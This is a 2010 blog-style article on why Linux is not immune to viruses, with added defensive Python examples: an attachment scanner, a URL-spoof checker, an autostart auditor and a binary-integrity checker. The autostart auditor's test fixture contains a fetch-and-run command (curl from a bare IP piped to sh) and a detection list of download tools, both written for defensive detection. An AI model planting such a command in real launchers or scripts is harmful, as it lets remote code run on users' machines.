February 9, 2010

Myth Busting: Is Linux Immune to Viruses?

In a word, "no."

No computer attached to a network is immune to viruses. But, as with everything else, it is relative: compare how exposed a typical Linux installation is with a typical Windows installation and you can understand why so many people say Linux is immune. Before we get into any myth busting, though, let's examine just what a computer virus is.

According to Wikipedia, a virus is "a computer program that can copy itself and infect a computer." That is a pretty broad description, and most people would expect something more specific. The same Wikipedia page continues: the term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, adware and spyware programs that do not have the reproductive ability. Now we're talking. Combining the two definitions, a computer virus is any malicious code that can infect a computer and replicate or distribute itself, or any malicious code that, although it cannot copy itself, can be unwittingly passed along by numerous electronic means.

Means to an End

Computer viruses can be transmitted in many ways, such as:

  • Email attachments.

  • Malicious URLs.

  • Within applications (such as browser add ons).

  • Rootkits (strictly a payload rather than a delivery route, but dangerous enough to get their own section below).

In this article I will try to show you that, although it is very challenging for a virus to infect a Linux machine, that does not mean you should go without protection.

Email Attachments

Why are email attachments less dangerous on Linux? Generally speaking, because nearly all malicious email attachments target Windows. Suspect attachments usually arrive as .exe files or as .zip archives containing a malicious .exe. When you click an .exe file on Linux, the system has no idea what to do with it; nothing is registered to run it. The exception is Wine: a Linux machine with Wine installed may well run a Windows executable, with the full privileges of your user account, so Wine users should not count on this protection.

But suppose the attachment targets Linux and arrives as a .deb, .rpm or .bin file. Those can be installed on Linux machines. First and foremost, if the file is a .deb and you are using an RPM-based system, the package manager will refuse it (unless you go out of your way to convert it with a tool such as alien). If you receive a .rpm attachment and you are using an RPM-based system, opening it launches the package installer, which asks for the root password or your own password via sudo (depending on which model your distribution uses), because installing a package means writing to system directories. A .bin file is different: it is usually a self-extracting installer, it cannot run until you mark it executable with chmod +x, and it then runs with whatever privileges you give it. Note that root is not required to do harm: a program running as your user can read or delete everything your user owns.

The proper reaction is to not proceed. The difference between this model and the traditional Windows model is that when you double-click an attachment on Windows, the program runs immediately with your account's privileges, and on the many systems where the everyday account is an administrator there is no further "sanity" check. Click and BOOM: the virus has installed itself and you are infected.

Now naturally, if you are using a Windows machine, you are taking advantage of an anti-virus solution to prevent such issues from arising. What about Linux? Do you need an anti-virus for Linux? You might be surprised when I say "Yes!" But why? If Linux is so much more immune to viruses, why should you employ a virus scanner?

Let me ask you a simple question: have you ever forwarded an email with attachments to another user? Was that user on Windows? If so, you may well have handed that attachment its chance at a successful infection. Scanning attachments on your Linux system closes that gap.

And if you run your own email server (Postfix or Sendmail, say) on a Linux machine, anti-virus scanning is a must. Just because the server is a Linux machine does not mean an email carrying a virus is harmless: the email-borne virus passes straight through and can easily reach a Windows machine, where it will happily begin its infectious life.

To that end, you owe it to yourself to install an anti-virus such as ClamAV. On a mail server, hook it into the MTA (for example through clamav-milter or amavisd-new) so that every message is scanned before delivery, and test the setup with the EICAR test file rather than waiting for real malware to reveal whether it works.
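As an added example (not code from the original article, and not ClamAV's own code), here is a small Python attachment scanner that does what a mail-gateway scanner does at its simplest: it walks every attachment of a message, looks inside .zip archives, and flags anything a Windows recipient could execute, whether by extension or by content (a file whose bytes carry a PE header is a Windows program whatever it is called). It also carries the EICAR test string, the harmless standard string every scanner is expected to detect, which is the right way to check that ClamAV or a tool like this is actually wired in. The sample message, the extension list and the size and nesting limits are constructed for the example.

```python
import email
import io
import os
import struct
import zipfile
from email import policy
from email.message import EmailMessage

# EICAR test string: the harmless industry-standard string every scanner must
# detect (transcribed from memory; check it against eicar.org before relying on it).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Extensions Windows executes on double-click. Constructed list, not exhaustive.
WINDOWS_EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".dll"}

MAX_ZIP_DEPTH = 3            # nested archives beyond this are reported, not opened
MAX_MEMBER_BYTES = 50 << 20  # refuse to inflate members over 50 MiB (zip-bomb guard)


def is_pe(data: bytes) -> bool:
    """True if data starts with a DOS header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify(name: str, data: bytes) -> list:
    """Reasons to treat one blob as dangerous to a Windows recipient (empty = none found)."""
    reasons = []
    if EICAR in data:
        reasons.append("eicar-test-signature")
    if is_pe(data):
        reasons.append("pe-header")          # content check: catches renamed executables
    ext = os.path.splitext(name.lower())[1]
    if ext in WINDOWS_EXEC_EXT:
        reasons.append(f"windows-executable-extension:{ext}")
    return reasons


def scan_blob(name: str, data: bytes, depth: int = 0, findings=None) -> list:
    """Classify one blob and, if it is a zip, every member inside it (recursively)."""
    if findings is None:
        findings = []
    reasons = classify(name, data)
    if reasons:
        findings.append((name, reasons))
    if zipfile.is_zipfile(io.BytesIO(data)):
        if depth >= MAX_ZIP_DEPTH:
            findings.append((name, ["zip-nesting-too-deep"]))
            return findings
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                member = f"{name}/{info.filename}"
                if info.file_size > MAX_MEMBER_BYTES:   # header-declared size; do not inflate
                    findings.append((member, ["zip-member-too-large"]))
                    continue
                scan_blob(member, zf.read(info), depth + 1, findings)
    return findings


def scan_message(raw: bytes) -> list:
    """Walk every attachment of an RFC 5322 message; return [(name, [reasons]), ...]."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        data = part.get_content()
        if isinstance(data, str):                 # text/* parts come back decoded
            data = data.encode(part.get_content_charset() or "utf-8", "replace")
        scan_blob(name, data, 0, findings)
    return findings


def build_sample_message() -> bytes:
    """Constructed test message: a zip hiding a stub PE file, the EICAR file, and a benign blob."""
    pe = bytearray(0x80)                     # stub DOS/PE header only, not a runnable program
    pe[0:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)   # e_lfanew -> offset 0x40
    pe[0x40:0x44] = b"PE\x00\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.pdf.exe", bytes(pe))
        zf.writestr("readme.txt", "nothing to see here")
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "you@example.invalid"
    msg["Subject"] = "Invoice"
    msg.set_content("See attached.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="invoice.zip")
    msg.add_attachment(EICAR, maintype="application", subtype="octet-stream", filename="eicar.com")
    msg.add_attachment(b"plain notes", maintype="application", subtype="octet-stream", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reasons in scan_message(build_sample_message()):
        print(f"{name}: {', '.join(reasons)}")
```

The content check matters more than the extension check: an attacker who renames payload.exe to invoice.pdf defeats the extension list but not the PE-header test. The nesting and size limits are there because a scanner that inflates whatever it is handed is itself a denial-of-service target.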

Malicious URLs

I have yet to come across a URL that has done any direct damage to a Linux machine. But URLs that attack the machine are not the only malicious kind. Another is the spoofed address: a malicious address that masquerades as a safe one, typically a fake bank or PayPal login page. Any number of addresses can be spoofed, and any address that asks you to log in with credentials is dangerous when spoofed, because those credentials go straight to the attacker.

Do these threats directly affect the Linux operating system? No, but they do affect the user. Fortunately most modern browsers have add-ons to protect your browsing, and these should not be neglected just because you are using Linux. A good sampling of Firefox add-ons can be found on the Firefox Security Add-ons page.
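As an added example (not part of the original article, and not the code of any browser add-on), the following Python checks a URL for the tricks spoofed login addresses rely on: a trusted name placed in the userinfo part (https://paypal.com@evil.example/ connects to evil.example), a brand name buried in an untrusted registrable domain (paypal.com.secure-login.example), raw IP hosts, plain http, and internationalised labels that look like ASCII ones. The trusted-domain set and the URLs are constructed; the two-label "registrable domain" rule is a deliberate simplification of the Public Suffix List.

```python
import ipaddress
from urllib.parse import urlsplit

# Sites the user really holds accounts at; constructed for the example.
TRUSTED = {"paypal.com", "example-bank.com"}


def registrable_domain(host: str) -> str:
    """Last two labels. Deliberate simplification: real code must consult the
    Public Suffix List, or 'co.uk'-style suffixes will be mis-parsed."""
    return ".".join(host.split(".")[-2:])


def assess_url(url: str, trusted=TRUSTED) -> list:
    """Reasons a login URL looks spoofed; an empty list means none of the checks fired."""
    parts = urlsplit(url)
    host = parts.hostname
    if not host:
        return ["no-host"]
    findings = []
    if parts.scheme != "https":
        findings.append("not-https")
    if parts.username is not None:
        # https://paypal.com@evil.example/ : the browser connects to evil.example;
        # everything before '@' is merely a username.
        findings.append(f"userinfo-in-authority:{parts.username}")
    try:
        ipaddress.ip_address(host)
        findings.append("ip-literal-host")
    except ValueError:
        pass
    # The browser resolves the ASCII (punycode) form; compare what it will actually use.
    try:
        ascii_host = host.encode("idna").decode("ascii")
    except UnicodeError:
        return findings + ["invalid-hostname"]
    for label in ascii_host.split("."):
        if label.startswith("xn--"):
            findings.append(f"non-ascii-label:{label}")
    if registrable_domain(ascii_host) not in trusted:
        for brand in sorted(t.split(".")[0] for t in trusted):
            if brand in ascii_host:
                findings.append(f"brand-in-untrusted-host:{brand}")
    return findings


if __name__ == "__main__":
    for u in ("https://www.paypal.com/signin",
              "https://paypal.com.secure-login.example/",
              "https://paypal.com@198.51.100.7/login",
              "https://p\u0430ypal.com/"):
        print(u, "->", assess_url(u) or "no spoofing indicators")
```

The last sample host contains a Cyrillic "а" in place of the Latin one; it renders identically in most fonts, which is why the check works on the punycode form the resolver sees rather than on what the user reads.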

Application Danger

Linux software comes from a great many sources, and you cannot trust every piece of software out there. You can, however, trust software distributed through your distribution's OFFICIAL channels. Packages in the Ubuntu Software Center, for example, are built by the distribution from published source and signed with the distribution's key, and apt verifies that signature before installing anything. Once you venture outside the realm of the "officially supported" (third-party repositories, packages downloaded from random websites), you risk installing malicious software.

That is not to say you should distrust all software that does not come through your distribution. Because Linux software is open source, it generally gets a lot of peer scrutiny, and no one wants to be known as the coder who wrote malicious Linux software.

But if you are of the paranoid persuasion, stick with software supported by your distribution and you should avoid installing any malicious code on your machine.

I will warn you, though, that there was a proof-of-concept virus for Linux that took advantage of the GNOME and KDE autostart mechanisms. Anything placed in ~/.config/autostart (GNOME, as a .desktop launcher) or ~/.kde/Autostart (KDE, where a plain script or link will do) runs at every login, as your user and without any password prompt, which is exactly why it needs no root. Anyone really paranoid (using either GNOME or KDE) could write a script to list the entries in those directories and flag anything suspicious. Just be careful that such a script does not delete anything important; reporting and reviewing by hand is safer than automatic deletion.
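The script the paragraph suggests, as an added example written for this page (not the author's): it audits the GNOME and KDE autostart directories and reports entries that look wrong rather than deleting them. The heuristics (programs run from /tmp, /var/tmp, /dev/shm or a hidden directory in $HOME; launchers whose Exec line invokes a download or decode tool; bare executables in KDE's Autostart; symlinks pointing outside $HOME and /usr) are constructed for the example. The demo() function builds a throw-away home directory with constructed entries so the audit can be exercised without touching your real one.

```python
import configparser
import os
import re
import shlex
import shutil
import tempfile
from pathlib import Path

# Per-user login items for GNOME and for the KDE 3/4 directory layout.
AUTOSTART_DIRS = ["~/.config/autostart", "~/.kde/Autostart"]

# Heuristics constructed for this example; a legitimate launcher rarely needs any of these.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
FETCH_OR_DECODE = ("base64", "curl", "nc", "perl", "python", "wget")


def parse_exec(desktop_path: Path):
    """Return the Exec= value of a .desktop file, or None if it has none."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read(desktop_path, encoding="utf-8")
    return cp.get("Desktop Entry", "Exec", fallback=None)


def audit_entry(path: Path, home: Path) -> list:
    """Reasons one autostart entry deserves a human look (empty list = nothing odd)."""
    reasons = []
    if path.is_symlink():
        target = os.path.realpath(path)
        if not (target.startswith(str(home) + "/") or target.startswith("/usr/")):
            reasons.append(f"symlink-outside-home-and-usr:{target}")
    if path.suffix != ".desktop":
        # KDE's Autostart runs any executable dropped here, launcher file or not.
        if path.is_file() and os.access(path, os.X_OK):
            reasons.append("bare-executable-in-autostart")
        return reasons
    cmd = parse_exec(path)
    if cmd is None:
        return reasons + ["desktop-file-without-Exec"]
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return reasons + ["exec-unparseable"]
    prog = argv[0] if argv else ""
    if prog.startswith(UNTRUSTED_PREFIXES) or prog.startswith(str(home) + "/."):
        reasons.append(f"exec-from-untrusted-location:{prog}")
    words = set(re.findall(r"[A-Za-z0-9_-]+", cmd))   # whole words, so "nc" != "nm-applet"
    for tool in FETCH_OR_DECODE:
        if tool in words:
            reasons.append(f"exec-fetches-or-decodes:{tool}")
    return reasons


def audit_autostart(dirs, home: Path) -> list:
    """[(entry path, [reasons]), ...] for every suspicious entry in the given directories."""
    findings = []
    for d in dirs:
        d = Path(os.path.expanduser(d))
        if not d.is_dir():
            continue
        for entry in sorted(d.iterdir()):
            reasons = audit_entry(entry, home)
            if reasons:
                findings.append((str(entry), reasons))
    return findings


def demo() -> list:
    """Constructed fixture: a throw-away home with one benign and three suspicious entries."""
    home = Path(tempfile.mkdtemp(prefix="autostart-demo-"))
    try:
        gnome, kde = home / ".config" / "autostart", home / ".kde" / "Autostart"
        gnome.mkdir(parents=True)
        kde.mkdir(parents=True)
        (gnome / "nm-applet.desktop").write_text(
            "[Desktop Entry]\nType=Application\nName=Network\nExec=nm-applet\n")
        (gnome / "updater.desktop").write_text(
            '[Desktop Entry]\nType=Application\nName=Updater\nExec=sh -c "curl -s http://203.0.113.9/p | sh"\n')
        (gnome / "tmp-loader.desktop").write_text(
            "[Desktop Entry]\nType=Application\nName=Loader\nExec=/tmp/.x/run --quiet\n")
        script = kde / "cleanup.sh"
        script.write_text("#!/bin/sh\necho hi\n")
        script.chmod(0o755)
        return audit_autostart([str(gnome), str(kde)], home)
    finally:
        shutil.rmtree(home)


if __name__ == "__main__":
    for entry, reasons in audit_autostart(AUTOSTART_DIRS, Path.home()):
        print(f"{entry}: {', '.join(reasons)}")
```

Run without arguments it audits your own login items and prints only what it dislikes; nothing is removed. A clean run is not proof of a clean machine, since the heuristics are deliberately narrow, but an entry fetching a script from a bare IP address at every login is worth a look on any desktop.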

Got Root?

Rootkits are the real danger. A rootkit is a collection of malicious software designed to conceal itself so thoroughly that the user has no idea it was installed and is running. I have been a victim of a rootkit (long ago) and strongly suggest adding the rkhunter tool. In fact, when installing a new Linux system, rkhunter is one of the first tools I add, and as soon as it is added, it is used: run rkhunter --propupd on the clean install so it records the file properties of known-good binaries to compare against later.

Rootkits are nasty pieces of software that, once installed, are really difficult (if not impossible) to remove. Some compromise your system so thoroughly that you cannot recover; the only sound response to a confirmed kernel-level rootkit is to reinstall from known-good media and restore your data from backups. If you are wondering how many rootkits are out there, install rkhunter and run rkhunter --list rootkits to see how many it checks for; you will be surprised. Bear in mind that a rootkit can subvert the very commands a scanner relies on, so a report produced on a compromised system is only as trustworthy as the binaries that produced it. And rootkits do not just attack servers. I have seen desktop machines infected with rootkits, especially machines that live on a static IP address with no firewall between them and the outside world.
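One of the checks rkhunter performs is comparing the properties of important system binaries against a baseline recorded while the system was known to be clean (that is what rkhunter --propupd stores). As an added example (not rkhunter's code), here is that idea in Python: record size, mode, owner, inode and a SHA-256 digest of each watched binary, then report any that changed or went missing. The watched list and the demo() fixture are constructed. The caveat that applies to any host-based check applies here too: keep the baseline somewhere the attacker cannot rewrite, and remember that a kernel-level rootkit can lie to stat() and read(), so a clean report from a compromised kernel proves nothing.

```python
import hashlib
import os
import shutil
import stat
import tempfile
from pathlib import Path

# Binaries a rootkit typically replaces or trojans; constructed list for the example.
WATCHED = ["/bin/ls", "/bin/ps", "/bin/netstat", "/usr/bin/find", "/usr/bin/ssh"]
FIELDS = ("sha256", "size", "mode", "uid", "inode")


def fingerprint(path: str) -> dict:
    """Properties of one file that a trojaned replacement is likely to disturb."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "size": st.st_size,
            "mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid, "inode": st.st_ino}


def build_baseline(paths) -> dict:
    """Fingerprint every watched path that exists. Store the result off-host or read-only."""
    return {p: fingerprint(p) for p in paths if os.path.isfile(p)}


def verify(baseline: dict) -> dict:
    """Return {path: [what changed]} for every baselined file that differs or is gone."""
    report = {}
    for path, expected in baseline.items():
        if not os.path.isfile(path):
            report[path] = ["missing"]
            continue
        current = fingerprint(path)
        changed = [f for f in FIELDS if current[f] != expected[f]]
        if changed:
            report[path] = changed
    return report


def demo() -> dict:
    """Constructed fixture: fake binaries in a temp dir; then trojan ps, setuid ls, delete netstat."""
    root = Path(tempfile.mkdtemp(prefix="propcheck-"))
    try:
        files = {name: root / name for name in ("ls", "ps", "netstat", "find")}
        for name, p in files.items():
            p.write_text(f"#!/bin/sh\necho {name} v1\n")
            p.chmod(0o755)
        baseline = build_baseline([str(p) for p in files.values()])
        files["ps"].write_text("#!/bin/sh\necho ps v1 (trojaned)\n")  # content and size change, inode stays
        files["ls"].chmod(0o4755)                                      # setuid bit added
        files["netstat"].unlink()                                      # binary removed
        return {os.path.basename(k): v for k, v in verify(baseline).items()}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, changes in demo().items():
        print(f"{path}: {', '.join(changes)}")
```

The unchanged inode on the trojaned ps is deliberate: an attacker who overwrites a binary in place keeps its inode, so a check that only compares inodes (or only timestamps, which are trivially reset) misses it; the digest does not. For real use, feed WATCHED to build_baseline(), write the dictionary to removable or read-only media, and run verify() against it from a boot you trust.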

Final Thoughts

So, what do you think? Is Linux immune to viruses? I hope your answer is "no." That answer, and the prevention it inspires, will keep your Linux machine virus free for years to come. Personally, I have used Linux for twelve years and not had a virus or any malicious software on any of my personal machines or servers. If you are cautious like me, you too can enjoy virus-free computing for years. But if you fall into the trap of believing that Linux is perfectly immune to viruses, you very well might fall victim to that naivety.


